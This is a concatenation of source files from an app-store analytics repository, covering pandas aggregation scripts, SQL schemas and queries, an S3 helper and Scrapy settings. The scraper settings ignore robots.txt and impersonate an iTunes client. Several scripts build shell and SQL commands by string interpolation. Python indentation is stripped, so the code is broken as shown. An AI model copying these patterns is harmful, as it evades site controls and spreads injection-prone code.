;<file_sep>/evaluation/py/aggregate_categories.py
"""
Generate SBE from the estimation directory.
We just iterate through the directory, and calculate SBE for all the csv.
"""
# Author: <NAME> <<EMAIL>>
import os
import os.path
import sys
import pandas as pd
from joblib import Parallel, delayed
# This step is time-consuming and we parallelize
def main():
_check_args()
input_dir = sys.argv[1]
output_dir = sys.argv[2]
Parallel(n_jobs=4)(delayed(_run)(f, input_dir, output_dir)
for f in filter(lambda s: s.endswith('.csv'), os.listdir(input_dir)))
def _run(f, input_dir, output_dir):
full_path = os.path.join(input_dir, f)
df = pd.read_csv(full_path)
agg = _aggregate_categories(df)
agg.to_csv(os.path.join(output_dir, f), index=False)
def _check_args():
if len(sys.argv) - 1 != 2:
raise Exception("Wrong number of arguments.")
input_dir = sys.argv[1]
output_dir = sys.argv[2]
if not (os.path.exists(input_dir) and os.path.exists(output_dir)):
raise Exception("Please make sure that both input and output dirs exist")
def _aggregate_categories(df):
potential_drops = ['category_id', 'rank']
potential_groups = ['app_id', 'date', 'feed_id']
potential_aggregate_strategies = {'estimate': pd.Series.mean,
'units': pd.Series.mean}
aggregate_strategies = {i: potential_aggregate_strategies[i]
for i in potential_aggregate_strategies.iterkeys()
if i in df.columns}
drops = [c for c in potential_drops if c in df.columns]
groups = [c for c in potential_groups if c in df.columns]
grouped = df.drop(drops, axis=1).groupby(groups)
agg = grouped.aggregate(aggregate_strategies)
return agg.reset_index()
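# Example: an input frame with columns [app_id, date, feed_id, category_id,
# rank, estimate] collapses to [app_id, date, feed_id, estimate], where
# estimate (and units, when present) is the mean over the categories/ranks
# an app appears in.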
if __name__ == '__main__':
main()
<file_sep>/old_investigations/android/run_fetch_and_concat.py
import sys
import os
import os.path
from dateutil import rrule
from optparse import OptionParser
from datetime import datetime
from dateutil.relativedelta import relativedelta
from internal.concat_by_daterange import concat_by_daterange
def parse_options():
parser = OptionParser()
parser.add_option("-s", "--stores", dest="stores",
help="Required. A list of the stores that you want to calculate, separated by comma. e.g. 1,2,3,4,6,7,9,10,22,27")
parser.add_option("-d", "--daterange", dest="daterange",
help="Required. Date range, could be a single month(e.g. 2012-09), a range of months(e.g. 2012-08--2012-10) " \
"or a range of days(e.g. 2012-03-02--2012-07-08)")
parser.add_option("-u", "--unitstypes", dest="units_types",
help="Required. A list of type of units to inspect (Downloads or USD), separated by comma. e.g. Downloads,USD")
parser.add_option("-x", "--overwrite", action="store_true", dest="overwrite",
help="Optional. Whether to overwrite the exisitng caches.")
(opts, args) = parser.parse_args()
try:
return refine_options(opts)
except Exception:
print(parser.print_help())
def make_first_day_of_month(dt):
return dt.replace(day=1)
# http://stackoverflow.com/questions/42950/get-last-day-of-the-month-in-python
def make_last_day_of_month(dt):
if dt.month == 12:
return dt.replace(day=31)
return dt.replace(month=dt.month + 1, day=1) - relativedelta(days=1)
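# e.g. make_last_day_of_month(datetime(2012, 2, 15)) -> 2012-02-29; stepping to
# the first of the next month and subtracting one day handles leap years.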
def refine_options(opts):
opts.stores = opts.stores.split(',')
opts.units_types = opts.units_types.split(',')
def convert_month_str(index, s):
"""
index=0: The first date in the daterange.
index=1: The second date in the daterange.
"""
s_split_len = len(s.split('-'))
if s_split_len == 3:
return datetime.strptime(s, '%Y-%m-%d')
elif s_split_len == 2:
d = datetime.strptime(s, '%Y-%m')
if index == 0:
# In this case d would be the first day of the month
# and it's exactly what we want
return d
else:
return make_last_day_of_month(d)
else:
raise Exception("Wrong month format")
months_split = opts.daterange.split('--')
opts.daterange = map(lambda x: convert_month_str(x[0], x[1]),
enumerate(months_split))
# When we have only one date and it's a month,
# that means we want a single month's data.
if (len(opts.daterange) == 1) and (len(months_split[0].split('-')) == 2):
opts.daterange.append(make_last_day_of_month(opts.daterange[0]))
return opts
def prepare_dirs():
# Make dirs
subdirs = ['monthly', 'raw_estimation', 'references']
for d in subdirs:
path = os.path.join('cache', d)
if not os.path.exists(path):
os.makedirs(path)
if not os.path.exists('data'):
os.makedirs('data')
def do_concat_monthly(opts, dt):
"""Generate monthly concated data as cache."""
dstart = dt
dend = dt + relativedelta(months=+1)
start_year, start_month = dstart.year, dstart.month
end_year, end_month = dend.year, dend.month
date_info = {'start_year': start_year, 'start_month': start_month,
'end_year': end_year, 'end_month': end_month}
if opts.overwrite:
overwrite_arg = ' -x'
else:
overwrite_arg = ''
for s in opts.stores:
for units_type in opts.units_types:
fetch_real_units_reference(s, units_type, date_info)
ret = os.system("python internal/concat_by_month.py -m %d-%.2d -s %s -u %s -n 15%s" %
(start_year, start_month, s, units_type, overwrite_arg))
if ret != 0:
sys.exit(2)
def fetch_real_units_reference(store, units_type, date_info):
"""Get the real values from the data warehouse.
"""
common_suffix = 'WHERE d.app_sales_date_id = asd.id AND d.store_id=%s ' % store + \
'AND asd.date >= DATE \'%(start_year)d-%(start_month).2d-01\' ' % date_info + \
'AND asd.date < DATE(\'%(end_year)d-%(end_month).2d-01\')) ' % date_info
directory = './cache/references/real_units_%s_%s-%.2d' % (store,
date_info['start_year'],
date_info['start_month'])
# Real Units for downloads and sales are in different tables.
# So we have to differentiate.
if units_type == 'Downloads':
outfile = '%s_Downloads.csv' % directory
cmd = 'echo "COPY (SELECT date, app_id, units FROM downloads d, app_sales_date asd ' + \
common_suffix + 'TO STDOUT with CSV HEADER" | psql -o "%s" -U aa -h 192.168.8.54 android_dwh' % outfile
elif units_type == 'USD':
outfile = "%s_USD.csv" % directory
cmd = 'echo "COPY (SELECT date, app_id, revenue FROM sales d, app_sales_date asd ' + \
common_suffix + 'TO STDOUT with CSV HEADER" | psql -o "%s" -U aa -h 192.168.8.54 android_dwh' % outfile
else:
raise Exception('Unit types should be Downloads or USD')
if not os.path.exists(outfile):
print("Fetching real units to %s" % outfile)
try:
ret = os.system(cmd)
print("RET", ret)
if ret is None or ret != 0:
raise Exception("Have problem fetching real values: %s" % cmd)
except Exception as e:
print(e)
os.remove(outfile)
sys.exit(2)
if __name__ == '__main__':
opts = parse_options()
prepare_dirs()
daterange = opts.daterange
print daterange
dtstart = daterange[0]
dtend = daterange[1] if len(daterange) > 1 else daterange[0]
months = rrule.rrule(rrule.MONTHLY, dtstart=dtstart, until=dtend)
for dt in months:
# Generate monthly cache.
do_concat_monthly(opts, dt)
concat_by_daterange(dtstart, dtend, opts)
print('Finished, the generated data should be in ./data/')
<file_sep>/int-vs-m-benchmark/create_table_statements_ios.sql
/*
Create table statements for android specific tables:
- est_app_rank
- est_ranking
- sbe_est_app_unique
- sbe_est_app
*/
use aa_benchmarking_ios;
DROP TABLE IF EXISTS est_app_rank;
DROP TABLE IF EXISTS est_ranking;
DROP TABLE IF EXISTS sbe_est_app_unique;
DROP TABLE IF EXISTS sbe_est_app;
CREATE TABLE est_app_rank (
app_id integer NOT NULL,
store_id integer NOT NULL,
category_id smallint NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
iphone_free smallint NOT NULL,
iphone_paid smallint NOT NULL,
iphone_revenue smallint NOT NULL,
ipad_free smallint NOT NULL,
ipad_paid smallint NOT NULL,
ipad_revenue smallint NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
category_id,
app_id)
);
CREATE TABLE est_ranking (
store_id integer NOT NULL,
category_id smallint NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
rank smallint NOT NULL,
iphone_free integer NOT NULL,
iphone_paid integer NOT NULL,
iphone_revenue integer NOT NULL,
ipad_free integer NOT NULL,
ipad_paid integer NOT NULL,
ipad_revenue integer NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
category_id,
rank)
);
CREATE TABLE sbe_est_app_unique (
app_id integer NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
store_id integer NOT NULL,
iphone_free integer NOT NULL,
iphone_paid integer NOT NULL,
iphone_revenue integer NOT NULL,
ipad_free integer NOT NULL,
ipad_paid integer NOT NULL,
ipad_revenue integer NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
app_id)
);
CREATE TABLE sbe_est_app (
app_id integer NOT NULL,
store_id integer NOT NULL,
category_id smallint NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
iphone_free integer NOT NULL,
iphone_paid integer NOT NULL,
iphone_revenue integer NOT NULL,
ipad_free integer NOT NULL,
ipad_paid integer NOT NULL,
ipad_revenue integer NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
category_id,
app_id)
);
<file_sep>/old_investigations/preprocess_test_data.py
'''
Created on Jan 16, 2013
@author: perezrafael
'''
import pandas as pd
import datetime
import psycopg2
EVENTS_DICT = {1: 'New version released',
2: 'Price changed',
3: 'Name changed',
6: 'Featured',
7: 'No longer featured',
8: 'URL changed',
11: 'In app purchase price changed',
12: 'Icon updated',
13: 'Screenshots updated',
14: 'Category changed',
15: 'Size changed',
16: 'Device requirements changed',
18: 'Company changed',
19: 'Installs changed',
20: 'Discovery',
21: 'Language changed'
}
def append_weekdays(df):
df_weekday = []
for index, value in df['date'].iteritems():
weekday = datetime.datetime.strptime(value, '%Y-%m-%d')
weekday = weekday.weekday() + 1
df_weekday.append(weekday)
df['weekday'] = pd.Series(df_weekday)
return df
def append_universal(df):
rdf = df
universals = pd.DataFrame(columns=['date', 'app_id', 'feed_id', 'category_id', 'rank', 'estimate', 'units', 'universal'])
for index, series in df[['category_id']].drop_duplicates().iterrows():
category = series['category_id']
cdf = df[df['category_id']==category][['date', 'app_id', 'feed_id', 'category_id']]
fdf = cdf[(cdf['feed_id']==0) | (cdf['feed_id']==101)]
if fdf.shape[0]>0:
fdf = fdf.groupby(['date', 'app_id']).count()
fdf = fdf[fdf['app_id']>1]
fdf = fdf[['feed_id', 'category_id']].reset_index()
fdf['universal'] = 1
fdf['category_id'] = category
fdf['feed_id'] = 0
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
fdf['feed_id'] = 101
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
fdf = cdf[(cdf['feed_id']==1) | (cdf['feed_id']==100)]
if fdf.shape[0]>0:
fdf = fdf.groupby(['date', 'app_id']).count()
fdf = fdf[fdf['app_id']>1]
fdf = fdf[['feed_id', 'category_id']].reset_index()
fdf['universal'] = 1
fdf['feed_id'] = 1
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
fdf['feed_id'] = 100
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
fdf = cdf[(cdf['feed_id']==2) | (cdf['feed_id']==102)]
if fdf.shape[0]>0:
fdf = fdf.groupby(['date', 'app_id']).count()
fdf = fdf[fdf['app_id']>1]
fdf = fdf[['feed_id', 'category_id']].reset_index()
fdf['universal'] = 1
fdf['feed_id'] = 2
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
fdf['feed_id'] = 102
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
universals = universals[['date', 'category_id', 'feed_id', 'app_id', 'universal']]
universals = universals.rename(columns={'universal':'universally_ranked'})
rdf = rdf.merge(universals, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
return rdf
def append_sbe(df):
gdf = df.groupby(['date', 'feed_id', 'app_id'])['estimate'].mean()
gdf = gdf.reset_index()
fdf = gdf[(gdf['feed_id']==0) | (gdf['feed_id']==101) | (gdf['feed_id']==1) | (gdf['feed_id']==100)]
ddf = fdf.groupby(['date','app_id'])['estimate'].sum().reset_index()
ddf = ddf.rename(columns={'estimate':'sbe'})
ddf = fdf.merge(ddf, on=['date', 'app_id'])
fdf = gdf[(gdf['feed_id']==2) | (gdf['feed_id']==102)]
udf = fdf.groupby(['date','app_id'])['estimate'].sum().reset_index()
udf = udf.rename(columns={'estimate':'sbe'})
udf = fdf.merge(udf, on=['date', 'app_id'])
fdf = ddf.append(udf)
fdf = fdf.drop('estimate', axis=1)
df = df.merge(fdf, on=['date', 'feed_id', 'app_id'])
return df
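# SBE per app/date: per-feed estimates are first averaged across categories,
# then summed over the iPhone/iPad download feeds (0, 1, 100, 101) and,
# separately, over the grossing feeds (2, 102).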
def get_event_name(x):
return EVENTS_DICT[x]
def append_app_events(df):
conn = psycopg2.connect(database='ios_dwh', user='aa', host='nile')
cur = conn.cursor()
max_date = df['date'].max()
df_apps = df['app_id'].dropna().drop_duplicates()
apps = map(int, df_apps.values)
apps = map(str, apps)
apps = ','.join(apps)
query = ("SELECT e.app_id, e.store_id, to_char(e.time, 'YYYY-MM-DD'), e.type "
"FROM events e "
"WHERE e.time::date<='%s' AND e.app_id IN (%s)"%(max_date, apps))
cur.execute(query)
events = pd.DataFrame(cur.fetchall())
events.columns = ['app_id', 'store_id', 'date', 'event']
events = events[['app_id', 'date', 'event']]
events['event'] = events['event'].map(get_event_name)
events = events.groupby(['date', 'app_id'])
fdf = pd.DataFrame(columns=['app_id', 'date', 'event'])
for event in events:
event_string = '; '.join(event[1]['event'].values)
ndf = pd.DataFrame({'app_id': [event[0][1]], 'date': [event[0][0]], 'event': [event_string]})
fdf = fdf.append(ndf)
df = df.merge(fdf, on=['app_id', 'date'], how='left')
cur.close()
conn.close()
return df
def select_not_nan(x, y):
if x>=0:
return x
if y>=0:
return y
return 0
def append_previous_day_price(df):
conn = psycopg2.connect(database='ios_dwh', user='aa', host='nile')
cur = conn.cursor()
max_date = df['date'].max()
df_apps = df['app_id'].dropna().drop_duplicates()
apps = map(int, df_apps.values)
apps = map(str, apps)
apps = ','.join(apps)
query = ("SELECT e.app_id, e.store_id, to_char(e.time, 'YYYY-MM-DD'), e.old_value, e.new_value "
"FROM events e "
"WHERE e.time::date<='%s' AND e.type=2 AND e.app_id IN (%s)"%(max_date, apps))
cur.execute(query)
events = pd.DataFrame(cur.fetchall())
events.columns = ['app_id', 'store_id', 'date', 'old_value', 'new_value']
events = events[['app_id', 'date', 'old_value', 'new_value']]
dates = pd.DataFrame({'date':df['date'].drop_duplicates()})
dates['key'] = 1
df_apps = pd.DataFrame({'app_id':df_apps})
df_apps['key'] = 1
date_app = pd.merge(dates, df_apps, on='key')[['date', 'app_id']]
events = events.merge(date_app, on=['date','app_id'], how='outer')
events = events.sort(['app_id', 'date'])
events = events.groupby('app_id')
fdf = pd.DataFrame(columns=['app_id', 'date', 'old_value', 'new_value'])
for event in events:
event[1]['old_value'] = event[1]['old_value'].fillna(method='bfill')
event[1]['new_value'] = event[1]['new_value'].fillna(method='ffill')
fdf = fdf.append(event[1])
fdf['previous_day_price'] = map(select_not_nan, fdf['old_value'], fdf['new_value'])
fdf = fdf[['app_id', 'date', 'previous_day_price']]
df = df.merge(fdf, on=['app_id', 'date'], how='left')
cur.close()
conn.close()
return df
if __name__ == '__main__':
country = 143441
category = 6014
feed = 0
country_name = 'USA'
category_name = 'Games'
feed_name = 'iPhone_Free'
month = '2012-07'
dir_cache = '/Users/perezrafael/appannie/data_science/cache/'
df = pd.read_csv(dir_cache+'monthly_original/United States_%s_Downloads.csv'%month)
curve = pd.read_csv(dir_cache+'raw_estimation_original/143441_0_%s-01.csv'%month)
curve = curve[(curve['category_id']==category) & (curve['feed_id']==feed)]
curve = curve[['rank','estimate']]
dates = pd.DataFrame({'date':df['date'].drop_duplicates()})
dates['key'] = 1
ranks = pd.DataFrame({'rank':df['rank'].drop_duplicates()})
ranks['key'] = 1
date_rank = pd.merge(dates, ranks, on='key')[['date', 'rank']]
fdf = df
fdf = append_sbe(fdf)
fdf = fdf[fdf['category_id']==category]
fdf = append_universal(fdf)
fdf = fdf[fdf['feed_id']==feed]
fdf = fdf.merge(date_rank, on=['date', 'rank'], how='outer')
fdf = fdf.drop('estimate', axis=1)
fdf = fdf.merge(curve, on='rank', how='outer')
fdf = append_weekdays(fdf)
fdf['category_id'] = category
fdf['feed_id'] = feed
fdf['store_id'] = country
fdf = append_previous_day_price(fdf)
fdf = append_app_events(fdf)
fdf = fdf.sort(['date', 'rank'])
fdf = fdf.reindex_axis(['date', 'weekday', 'store_id', 'feed_id', 'category_id', 'rank', 'app_id', 'units', 'estimate', 'sbe', 'universally_ranked', 'previous_day_price', 'event'], axis=1)
fdf.to_csv(dir_cache+'%s_%s_%s_%s.csv'%(month, country_name, category_name, feed_name), index=False)
print 'Finished'<file_sep>/customers-also-bought/lib/customer_scrapers/customer_scrapers/settings.py
# -*- coding: utf-8 -*-
# Scrapy settings for customer_scrapers project
#
# For simplicity, this file contains only the most important settings by
# default. All the other settings are documented here:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
#
BOT_NAME = 'customer_scrapers'
SPIDER_MODULES = ['customer_scrapers.spiders']
NEWSPIDER_MODULE = 'customer_scrapers.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'customer_scrapers (+http://www.yourdomain.com)'
CONCURRENT_REQUESTS_PER_DOMAIN = 1
COUNTRY_EXTERNAL_ID = 143441
DEFAULT_REQUEST_HEADERS = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip',
'Accept-Language': 'en-us, en;',
'X-Apple-Tz': '7200',
'X-Apple-Store-Front': '{country_external_id}-1,17'.format(country_external_id=COUNTRY_EXTERNAL_ID)
}
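# 143441 is the iTunes storefront ID for the US; the '-1,17' suffix appears to
# encode the language/client variant iTunes expects in X-Apple-Store-Front.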
DEPTH_LIMIT = 5
DOWNLOAD_DELAY = 10
ROBOTSTXT_OBEY = False
USER_AGENT = 'iTunes/11.1.4 (Windows; Microsoft Windows 7 x64 Business Edition Service Pack 1 (Build 7601)) AppleWebKit/537.60.11'
LOG_FILE = 'scrape.log'
<file_sep>/evaluation/py/merge_sbe_and_median_rank.py
import sys
import os, os.path
from collections import defaultdict
import pandas as pd
def main():
sbe_dir = sys.argv[1]
median_rank_dir = sys.argv[2]
output_dir = sys.argv[3]
input_files = _listdir_with_fullpath(sbe_dir) + _listdir_with_fullpath(median_rank_dir)
input_files = filter(lambda s: s.endswith('.csv'), input_files)
g = _group_same_filenames(input_files)
for (group_name, files) in g:
if len(files) != 2:
print("Confused with the files: %s" % files)
continue
df = _merge_sbe_and_median_rank(map(pd.read_csv, files))
df.to_csv(os.path.join(output_dir, group_name), index=False)
def _listdir_with_fullpath(d):
return [os.path.join(d, i) for i in os.listdir(d)]
def _group_same_filenames(paths):
# Corresponding est and real values should have the same base name.
# Despite that they're in different dirs.
d = defaultdict(list)
for s in paths:
d[os.path.basename(s)].append(s)
return d.iteritems()
def _merge_sbe_and_median_rank(dfs):
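# Inner join on app_id: only apps present in both the SBE and the median-rank
# frame survive the merge.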
merged = pd.merge(*dfs, on=['app_id'], how='inner')
return merged
if __name__ == '__main__':
main()
<file_sep>/aa_au_model/heavy_usage/sql/get_mdm_usage.sql
-- Get usage per device on MDM
-- Note: should be run on Redshift EDW
-- MONTHLY
select
dp.package,
fam.guid_key,
dgm.platform,
dgm.device_type_snapshot
from
edw.fact_app_monthly fam
join edw.dim_guid_monthly dgm
using(utc_date_key, guid_key)
join edw.dim_operator dop
on dgm.home_operator_key = dop.operator_key
join edw.dim_package dp
using(package_key)
where
fam.utc_date_key = 20150301
and dop.iso_country_code = 'us'
and not dgm.has_bad_record
and (fam.reported_screen_time or fam.reported_days_running)
and dgm.days_with_records >= 20
;
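-- The weekly query below mirrors the monthly one, but reads the *_weekly fact
-- and guid tables and relaxes the days_with_records threshold from 20 to 5.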
-- WEEKLY
select
dp.package,
fam.guid_key,
dgm.platform,
dgm.device_type_snapshot
from
edw.fact_app_weekly fam
join edw.dim_guid_weekly dgm
using(utc_date_key, guid_key)
join edw.dim_operator dop
on dgm.home_operator_key = dop.operator_key
join edw.dim_package dp
using(package_key)
where
fam.utc_date_key = 20150412
and dop.iso_country_code = 'us'
and not dgm.has_bad_record
and (fam.reported_screen_time or fam.reported_days_running)
and dgm.days_with_records >= 5
;<file_sep>/aa_au_model/hive_scripts/workflow/module/s3.py
# Copyright (c) 2015 App Annie Inc. All rights reserved.
import boto
from boto.s3.connection import S3Connection
class S3Exception(Exception):
pass
class S3Storage(object):
def __init__(self, aws_access_key_id, aws_secret_access_key):
self.aws_access_key_id = aws_access_key_id
self.aws_secret_access_key = aws_secret_access_key
self.conn = None
def get_connection(self):
if not self.conn:
self.conn = S3Connection(
self.aws_access_key_id,
self.aws_secret_access_key
)
return self.conn
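# Minimal usage sketch (bucket, key and credentials are placeholders):
#
# storage = S3Storage('ACCESS_KEY', 'SECRET_KEY')
# storage.put('my-bucket', 'some/key.txt', 'hello', content_type='text/plain')
# print storage.get('my-bucket', 'some/key.txt')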
def get(self, bucket_name, key_name, content_type=None):
try:
bucket = self.get_connection().get_bucket(bucket_name, validate=False)
key = bucket.new_key(key_name)
if content_type:
key.set_metadata("Content-Type", content_type)
return key.get_contents_as_string()
except boto.exception.S3ResponseError as ex:
if ex.status == 404:
return None
else:
raise S3Exception(ex)
except Exception as ex:
raise S3Exception(ex)
def get_contents_to_filename(self, bucket_name, key_name, file_name, content_type=None):
try:
bucket = self.get_connection().get_bucket(bucket_name, validate=False)
key = bucket.new_key(key_name)
if content_type:
key.set_metadata("Content-Type", content_type)
key.get_contents_to_filename(file_name)
except boto.exception.S3ResponseError as ex:
if ex.status == 404:
return None
else:
raise S3Exception(ex)
except Exception as ex:
raise S3Exception(ex)
def copy(self, dst_bucket, dst_key, src_bucket, src_key):
bucket = self.get_connection().get_bucket(dst_bucket, validate=False)
try:
bucket.copy_key(dst_key, src_bucket, src_key)
return True
except Exception as ex:
raise S3Exception(ex)
def exists(self, bucket_name, key_name):
try:
bucket = self.get_connection().get_bucket(bucket_name, validate=False)
key = bucket.get_key(key_name)
return key is not None
except Exception as ex:
raise S3Exception(ex)
def put(self, bucket_name, key_name, data, content_type=None, public=False):
try:
bucket = self.get_connection().get_bucket(bucket_name, validate=False)
key = bucket.new_key(key_name)
if content_type:
key.set_metadata("Content-Type", content_type)
key.set_contents_from_string(data)
if public:
key.make_public()
except Exception as ex:
raise S3Exception(ex)
def delete(self, bucket_name, key_name):
try:
bucket = self.get_connection().get_bucket(bucket_name, validate=False)
key = bucket.new_key(key_name)
key.delete()
except Exception as ex:
raise S3Exception(ex)
def list(self, bucket_name, prefix=''):
try:
bucket = self.get_connection().get_bucket(bucket_name, validate=False)
for key in bucket.list(prefix=prefix):
yield key.name
except Exception as ex:
raise S3Exception(ex)
def size(self, bucket_name, prefix=''):
s = 0
try:
bucket = self.get_connection().get_bucket(bucket_name, validate=False)
for key in bucket.list(prefix=prefix):
s += key.size
return s
except Exception as ex:
raise S3Exception(ex)
def set_contents_from_filename(self, bucket_name, key_name, file_name, content_type=None, public=False):
try:
bucket = self.get_connection().get_bucket(bucket_name, validate=False)
key = bucket.new_key(key_name)
if content_type:
key.set_metadata("Content-Type", content_type)
key.set_contents_from_filename(file_name)
if public:
key.make_public()
except Exception as ex:
raise S3Exception(ex)
def update_storage_to_rrs(self, bucket_name, prefix=''):
try:
bucket = self.get_connection().get_bucket(bucket_name, validate=False)
for key in bucket.list(prefix=prefix):
if key.storage_class != 'REDUCED_REDUNDANCY':
key.copy(key.bucket.name, key.name, reduced_redundancy=True)
except Exception as ex:
raise S3Exception(ex)<file_sep>/icon-matching-framework/analysis_script.sql
-- DROP TEMPORARY TABLE IF EXISTS temp.hm_test;
-- CREATE TEMPORARY TABLE temp.hm_test
-- SELECT
-- m1.appstore_id as from_market,
-- m1.application_id as from_app_id,
-- m2.appstore_id as to_market,
-- m2.application_id as to_app_id,
-- HEX(m1.icon_hash) as from_hash,
-- HEX(m2.icon_hash) as to_hash,
-- BIT_COUNT(CAST(CONV(HEX(SUBSTR(m1.icon_hash,1,8)),16,10) AS UNSIGNED INTEGER) ^ CAST(CONV(HEX(SUBSTR(m2.icon_hash,1,8)),16,10) AS UNSIGNED INTEGER))+
-- BIT_COUNT(CAST(CONV(HEX(SUBSTR(m1.icon_hash,9,8)),16,10) AS UNSIGNED INTEGER) ^ CAST(CONV(HEX(SUBSTR(m2.icon_hash,9,8)),16,10) AS UNSIGNED INTEGER))+
-- BIT_COUNT(CAST(CONV(HEX(SUBSTR(m1.icon_hash,17,2)),16,10) AS UNSIGNED INTEGER) ^ CAST(CONV(HEX(SUBSTR(m2.icon_hash,17,2)),16,10) AS UNSIGNED INTEGER)) as diff
-- FROM
-- app_matching_dev.matched_applications m1
-- JOIN app_matching_dev.matches a ON
-- m1.appstore_id = a.from_appstore_id AND
-- m1.application_id= a.from_application_id
-- JOIN app_matching_dev.matched_applications m2 ON
-- m2.appstore_id = a.to_appstore_id AND
-- m2.application_id= a.to_application_id
-- UNION
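-- diff below is the Hamming distance between two 18-byte icon hashes, XOR-ed
-- in 8+8+2 byte chunks because CONV()/BIT_COUNT() operate on 64-bit integers.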
SELECT
m1.appstore_id as from_market,
m1.application_id as from_app_id,
m2.appstore_id as to_market,
m2.application_id as to_app_id,
HEX(m1.icon_hash) as from_hash,
HEX(m2.icon_hash) as to_hash,
BIT_COUNT(CAST(CONV(HEX(SUBSTR(m1.icon_hash,1,8)),16,10) AS UNSIGNED INTEGER) ^ CAST(CONV(HEX(SUBSTR(m2.icon_hash,1,8)),16,10) AS UNSIGNED INTEGER))+
BIT_COUNT(CAST(CONV(HEX(SUBSTR(m1.icon_hash,9,8)),16,10) AS UNSIGNED INTEGER) ^ CAST(CONV(HEX(SUBSTR(m2.icon_hash,9,8)),16,10) AS UNSIGNED INTEGER))+
BIT_COUNT(CAST(CONV(HEX(SUBSTR(m1.icon_hash,17,2)),16,10) AS UNSIGNED INTEGER) ^ CAST(CONV(HEX(SUBSTR(m2.icon_hash,17,2)),16,10) AS UNSIGNED INTEGER)) as diff
FROM
app_matching_dev.matched_applications m1
JOIN app_matching_dev.matched_applications m2 ON
m2.appstore_id <> m1.appstore_id
JOIN app_matching_dev.matches a ON
m1.appstore_id = a.from_appstore_id AND
m1.application_id = a.from_application_id AND
m2.appstore_id = a.to_appstore_id AND
m2.application_id <> a.to_application_id
LIMIT 10
;<file_sep>/aa_au_model/correction/data.py
# -*- coding: utf-8 -*-
__author__ = 'hgriffioen'
import ast
import db
import datetime
import glob
import numpy as np
import pandas as pd
import warnings
from constants import DATA_FOLDER
from constants import DATA_VERSION
from constants import ISO_CODE
from constants import SAMPLE_BUCKET_PATH
from constants import MDM_BUCKET_PATH
from lib import import_data
AGE_BINS = [0, 24, 34, 44, 54, 150]
AGE_BIN_LABELS = ['13-24', '25-34', '35-44', '45-54', '55+']
ADX_EXPRESSION = SAMPLE_BUCKET_PATH + 'EXTERNAL_DATA/ADX/*/first_connection/part*'
ADX_COLUMNS = ['device_id', 'bundle_id', 'datestr', 'source', 'age_from', 'age_to', 'is_male', 'country']
QUESTIONNAIRE_DIR = SAMPLE_BUCKET_PATH + 'USER_SURVEY/'
QUESTIONNAIRE_COLUMNS = ['device_id', 'bundle_id', 'source', 'timestamp', 'question_id', 'answer', 'country']
QUESTIONNAIRE_INVERSE_ANSWER_MAPPING = {
'male': ['Male', '男性', 'Muž', 'Männlich', 'Masculino', 'Homme', 'Uomo', '남성', 'Masculino', 'Homem',
'Мужской', 'Erkek', '男性', '男性'],
'female': ['Female', '女性', 'Žena', 'Weiblich', 'Femenino', 'Femme', 'Donna', '여성', 'Feminino', 'Mulher',
'Женский', 'Kadın', '女性', '女性'],
'13-17': ['13-17'],
'18-24': ['18-24'],
'25-34': ['25-34'],
'35-44': ['35-44'],
'45-54': ['45-54', '45-55'],
'55+': ['55+', '55'],
}
QUESTIONNAIRE_INVERSE_QUESTION_MAPPING = {
'gender': ['male', 'female'],
'age': ['13-17', '18-24', '25-34', '35-44', '45-54', '55+'],
}
QUESTIONNAIRE_AGE_BIN_MAPPING = {
'13-17': '13-24',
'18-24': '13-24',
'25-34': '25-34',
'35-44': '35-44',
'45-54': '45-54',
'55+': '55+'
}
FB_INSIGHTS_EXPRESSION = SAMPLE_BUCKET_PATH + 'EXTERNAL_DATA/FB_INSIGHTS/*/*'
FB_INSIGHTS_COLUMNS = ['date', 'bundle_id', 'count', 'age_from', 'age_to', 'is_male', 'network']
DPI_APPS_BASE_PATH = SAMPLE_BUCKET_PATH + 'VPN_DPI_APPS/'
DPI_APPS_COLUMNS = ['app_id', 'version', 'country', 'app_name', 'bundle_id', 'category', 'type', 'is_native',
'timestamp', 'load_devices']
VALID_ZERO_SECOND_SESSION_APPS = ['com.google.Translate', 'com.sgn.cookiejam',
'com.bitrhymes.bingo2', 'com.weplaydots.twodots']
DPI_CONFLICT_PATH = 'dpi_conflict_apps.csv'
USAGE_PATH = 'device_bundleids_weekly.tsv'
USAGE_COLUMNS = ['datestr', 'device_id', 'bundle_id']
ACTIVE_PATH = 'active_devices_{time_frame}.csv'
ACTIVE_COLUMNS = ['end_date', 'device_id']
PROBABILITIES_DIR = SAMPLE_BUCKET_PATH + 'USAGE_MODEL_METRICS/DEVICE_AGE_GENDER_PREDICTION/WEEK/v1.0.0/US/'
PROBABILITIES_COLUMNS = ['device_id', 'platform', 'device_type', 'gender_dict']
ACTIVE_USERS_DIR = SAMPLE_BUCKET_PATH + 'USAGE_MODEL_METRICS/AU_{time_frame}/' + DATA_VERSION + '/'
